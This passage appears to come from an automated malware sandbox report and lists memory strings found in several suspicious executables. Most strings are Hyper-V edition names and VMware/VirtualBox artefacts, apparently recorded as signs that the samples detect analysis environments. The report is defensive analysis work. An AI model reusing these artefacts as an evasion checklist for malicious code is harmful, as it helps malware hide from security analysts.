Source: firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Hyper-V (guest)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000005F6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: 8NjcvPNvUr.exe, 00000000.00000002.1687078940.000000000044B000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1712195825.000000000050B000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1715924134.000000000050B000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2920362161.000000000050B000.00000040.00000001.01000000.00000007.sdmp, RoamingHJDBKJKFIE.exe, 0000000F.00000002.2581280707.0000000000E2B000.00000040.00000001.01000000.0000000D.sdmp, userKFHCAEGCBF.exe, 00000012.00000002.2598761608.0000000000DF9000.00000040.00000001.01000000.0000000E.sdmp, axplong.exe, 00000013.00000002.2624518320.0000000000349000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: 8ec8c5c339.exe, 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareF
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: explorti.exe, 00000007.00000002.2926586035.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2926586035.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.00000000024C7000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000000A.00000002.2721852651.0000000002639000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2626428785.00000238E8EA0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2643663526.000001F41410A000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.00000000026DA000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 0000001E.00000002.2782069458.000000000272E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: firefox.exe, 00000018.00000002.2629600629.00000238F2FB4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645210207.000001F414514000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 8ec8c5c339.exe, 00000008.00000002.2740205336.000000000249E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareJ
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 8ec8c5c339.exe, 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: userKFHCAEGCBF.exe, 00000012.00000003.2567537123.000000000169B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: xVBoxService.exe
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 1c593ec106.exe, 00000009.00000002.2920638250.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000000C.00000002.2920479806.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp, 1c593ec106.exe, 0000001F.00000002.2921383968.00000000004C6000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
